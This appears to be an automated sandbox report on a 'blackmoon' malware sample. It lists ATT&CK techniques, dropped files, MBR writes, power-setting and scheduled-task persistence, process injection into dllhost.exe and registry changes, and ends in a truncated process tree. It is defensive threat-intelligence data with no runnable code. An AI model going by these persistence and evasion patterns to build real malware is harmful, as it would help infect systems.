blackmoon | f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
748	cmd.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
464	cmd.exe
4692	powercfg.exe
3716	cmd.exe
2288	powercfg.exe
3936	cmd.exe
4332	cmd.exe
216	powercfg.exe
3684	cmd.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	sqnlgfm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	sqnlgfm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	sqnlgfm.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	sqnlgfm.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\vdcerqaa	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4104 set thread context of 1552	4104	powershell.EXE	97
PID 1028 set thread context of 4132	1028	powershell.EXE	104

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3788-0-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/memory/3788-4-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/files/0x000a000000023b83-7.dat	upx
behavioral2/memory/3936-11-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/memory/3016-371-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/files/0x000c000000023b91-662.dat	upx
behavioral2/memory/4364-663-0x00007FF7B0600000-0x00007FF7B0C1F000-memory.dmp	upx
behavioral2/memory/4364-671-0x00007FF7B0600000-0x00007FF7B0C1F000-memory.dmp	upx
behavioral2/memory/3388-678-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/memory/2276-702-0x0000000000400000-0x0000000000695000-memory.dmp	upx

Drops file in Windows directory 22 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\$pdemlcouddlopeig.job	acbzga.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File created	\??\c:\windows\fonts\xhaubjd\HighPower.pow	sqnlgfm.exe
File opened for modification	\??\c:\windows\fonts\dcjgbeul\gnygcm.exe	sqnlgfm.exe
File created	\??\c:\windows\fonts\dcjgbeul\gnygcm.exe	sqnlgfm.exe
File created	\??\c:\windows\fonts\dcjgbeul\WinRing0x64.sys	sqnlgfm.exe
File created	C:\Windows\Tasks\$pdemlcouuggpuexp.job	acbzga.exe
File opened for modification	\??\c:\windows\ime\lgoavey\ovhzrec.exe	sqnlgfm.exe
File created	\??\c:\windows\fonts\xhaubjd\sqnlgfm.exe	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
File opened for modification	C:\Windows\ServiceState\EventLog\Data\lastalive0.dat	svchost.exe
File opened for modification	C:\Windows\Tasks\$pdemlcouddlopeig.job	acbzga.exe
File created	\??\c:\windows\fonts\dcjgbeul\config.json	sqnlgfm.exe
File created	\??\c:\windows\fonts\qvcldnjm\xcacbus.exe	sqnlgfm.exe
File opened for modification	C:\Windows\Tasks\$pdemlcouuggpuexp.job	acbzga.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	\??\c:\windows\fonts\xhaubjd\sqnlgfm.exe	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
File created	\??\c:\windows\ime\lgoavey\ovhzrec.exe	sqnlgfm.exe
File created	\??\c:\windows\fonts\xhaubjd\BestPower.pow	sqnlgfm.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sqnlgfm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sqnlgfm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acbzga.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3968	cmd.exe
400	PING.EXE

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	sqnlgfm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010B00B94CE"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
400	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
3936	sqnlgfm.exe
3936	sqnlgfm.exe
3016	sqnlgfm.exe
3016	sqnlgfm.exe
3016	sqnlgfm.exe
3016	sqnlgfm.exe
4104	powershell.EXE
4104	powershell.EXE
1028	powershell.EXE
1028	powershell.EXE
4104	powershell.EXE
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
4304	wmiprvse.exe
4304	wmiprvse.exe
4304	wmiprvse.exe
4304	wmiprvse.exe
4304	wmiprvse.exe
4304	wmiprvse.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe
1552	dllhost.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
Token: SeDebugPrivilege	3936	sqnlgfm.exe
Token: SeDebugPrivilege	3016	sqnlgfm.exe
Token: SeDebugPrivilege	3016	sqnlgfm.exe
Token: SeDebugPrivilege	4104	powershell.EXE
Token: SeDebugPrivilege	1028	powershell.EXE
Token: SeDebugPrivilege	4104	powershell.EXE
Token: SeDebugPrivilege	1552	dllhost.exe
Token: SeShutdownPrivilege	2932	svchost.exe
Token: SeCreatePagefilePrivilege	2932	svchost.exe
Token: SeShutdownPrivilege	2932	svchost.exe
Token: SeCreatePagefilePrivilege	2932	svchost.exe
Token: SeShutdownPrivilege	2932	svchost.exe
Token: SeCreatePagefilePrivilege	2932	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2064	svchost.exe
Token: SeIncreaseQuotaPrivilege	2064	svchost.exe
Token: SeSecurityPrivilege	2064	svchost.exe
Token: SeTakeOwnershipPrivilege	2064	svchost.exe
Token: SeLoadDriverPrivilege	2064	svchost.exe
Token: SeBackupPrivilege	2064	svchost.exe
Token: SeRestorePrivilege	2064	svchost.exe
Token: SeShutdownPrivilege	2064	svchost.exe
Token: SeSystemEnvironmentPrivilege	2064	svchost.exe
Token: SeManageVolumePrivilege	2064	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2064	svchost.exe
Token: SeIncreaseQuotaPrivilege	2064	svchost.exe
Token: SeSecurityPrivilege	2064	svchost.exe
Token: SeTakeOwnershipPrivilege	2064	svchost.exe
Token: SeLoadDriverPrivilege	2064	svchost.exe
Token: SeSystemtimePrivilege	2064	svchost.exe
Token: SeBackupPrivilege	2064	svchost.exe
Token: SeRestorePrivilege	2064	svchost.exe
Token: SeShutdownPrivilege	2064	svchost.exe
Token: SeSystemEnvironmentPrivilege	2064	svchost.exe
Token: SeUndockPrivilege	2064	svchost.exe
Token: SeManageVolumePrivilege	2064	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2064	svchost.exe
Token: SeIncreaseQuotaPrivilege	2064	svchost.exe
Token: SeSecurityPrivilege	2064	svchost.exe
Token: SeTakeOwnershipPrivilege	2064	svchost.exe
Token: SeLoadDriverPrivilege	2064	svchost.exe
Token: SeSystemtimePrivilege	2064	svchost.exe
Token: SeBackupPrivilege	2064	svchost.exe
Token: SeRestorePrivilege	2064	svchost.exe
Token: SeShutdownPrivilege	2064	svchost.exe
Token: SeSystemEnvironmentPrivilege	2064	svchost.exe
Token: SeUndockPrivilege	2064	svchost.exe
Token: SeManageVolumePrivilege	2064	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2064	svchost.exe
Token: SeIncreaseQuotaPrivilege	2064	svchost.exe
Token: SeSecurityPrivilege	2064	svchost.exe
Token: SeTakeOwnershipPrivilege	2064	svchost.exe
Token: SeLoadDriverPrivilege	2064	svchost.exe
Token: SeSystemtimePrivilege	2064	svchost.exe
Token: SeBackupPrivilege	2064	svchost.exe
Token: SeRestorePrivilege	2064	svchost.exe
Token: SeShutdownPrivilege	2064	svchost.exe
Token: SeSystemEnvironmentPrivilege	2064	svchost.exe
Token: SeUndockPrivilege	2064	svchost.exe
Token: SeManageVolumePrivilege	2064	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2064	svchost.exe
Token: SeIncreaseQuotaPrivilege	2064	svchost.exe
Token: SeSecurityPrivilege	2064	svchost.exe
Token: SeTakeOwnershipPrivilege	2064	svchost.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
3936	sqnlgfm.exe
3016	sqnlgfm.exe
2052	Conhost.exe
3608	Conhost.exe
4456	Conhost.exe
60	Conhost.exe
1804	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3788 wrote to memory of 3968	3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe	85
PID 3788 wrote to memory of 3968	3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe	85
PID 3788 wrote to memory of 3968	3788	f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe	85
PID 3968 wrote to memory of 400	3968	cmd.exe	87
PID 3968 wrote to memory of 400	3968	cmd.exe	87
PID 3968 wrote to memory of 400	3968	cmd.exe	87
PID 3968 wrote to memory of 3936	3968	cmd.exe	89
PID 3968 wrote to memory of 3936	3968	cmd.exe	89
PID 3968 wrote to memory of 3936	3968	cmd.exe	89
PID 3016 wrote to memory of 2884	3016	sqnlgfm.exe	92
PID 3016 wrote to memory of 2884	3016	sqnlgfm.exe	92
PID 3016 wrote to memory of 2884	3016	sqnlgfm.exe	92
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 4104 wrote to memory of 1552	4104	powershell.EXE	97
PID 1552 wrote to memory of 588	1552	dllhost.exe	5
PID 1552 wrote to memory of 672	1552	dllhost.exe	7
PID 1552 wrote to memory of 956	1552	dllhost.exe	12
PID 1552 wrote to memory of 332	1552	dllhost.exe	13
PID 1552 wrote to memory of 436	1552	dllhost.exe	14
PID 1552 wrote to memory of 924	1552	dllhost.exe	15
PID 1552 wrote to memory of 1056	1552	dllhost.exe	16
PID 1552 wrote to memory of 1072	1552	dllhost.exe	17
PID 1552 wrote to memory of 1148	1552	dllhost.exe	19
PID 1552 wrote to memory of 1192	1552	dllhost.exe	20
PID 1552 wrote to memory of 1252	1552	dllhost.exe	21
PID 1552 wrote to memory of 1308	1552	dllhost.exe	22
PID 1552 wrote to memory of 1360	1552	dllhost.exe	23
PID 1552 wrote to memory of 1428	1552	dllhost.exe	24
PID 1552 wrote to memory of 1448	1552	dllhost.exe	25
PID 1552 wrote to memory of 1484	1552	dllhost.exe	26
PID 1552 wrote to memory of 1500	1552	dllhost.exe	27
PID 1552 wrote to memory of 1644	1552	dllhost.exe	28
PID 1552 wrote to memory of 1680	1552	dllhost.exe	29
PID 1552 wrote to memory of 1744	1552	dllhost.exe	30
PID 1552 wrote to memory of 1808	1552	dllhost.exe	31
PID 1552 wrote to memory of 1824	1552	dllhost.exe	32
PID 1552 wrote to memory of 1940	1552	dllhost.exe	33
PID 1552 wrote to memory of 1984	1552	dllhost.exe	34
PID 1552 wrote to memory of 2000	1552	dllhost.exe	35
PID 1552 wrote to memory of 1476	1552	dllhost.exe	36
PID 1552 wrote to memory of 2064	1552	dllhost.exe	37
PID 1552 wrote to memory of 2144	1552	dllhost.exe	38
PID 1552 wrote to memory of 2236	1552	dllhost.exe	40
PID 1552 wrote to memory of 2340	1552	dllhost.exe	41
PID 1552 wrote to memory of 2452	1552	dllhost.exe	42
PID 1552 wrote to memory of 2460	1552	dllhost.exe	43
PID 1552 wrote to memory of 2608	1552	dllhost.exe	44
PID 1552 wrote to memory of 2632	1552	dllhost.exe	45
PID 1552 wrote to memory of 2656	1552	dllhost.exe	46
PID 1552 wrote to memory of 2680	1552	dllhost.exe	47
PID 1552 wrote to memory of 2716	1552	dllhost.exe	48
PID 1552 wrote to memory of 2944	1552	dllhost.exe	49
PID 1552 wrote to memory of 3000	1552	dllhost.exe	50
PID 1552 wrote to memory of 3032	1552	dllhost.exe	51
PID 1552 wrote to memory of 2844	1552	dllhost.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7d5cd752-9975-443a-9458-25f81bd10f75}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1552
- C:\Windows\SysWOW64\dllhost.exe
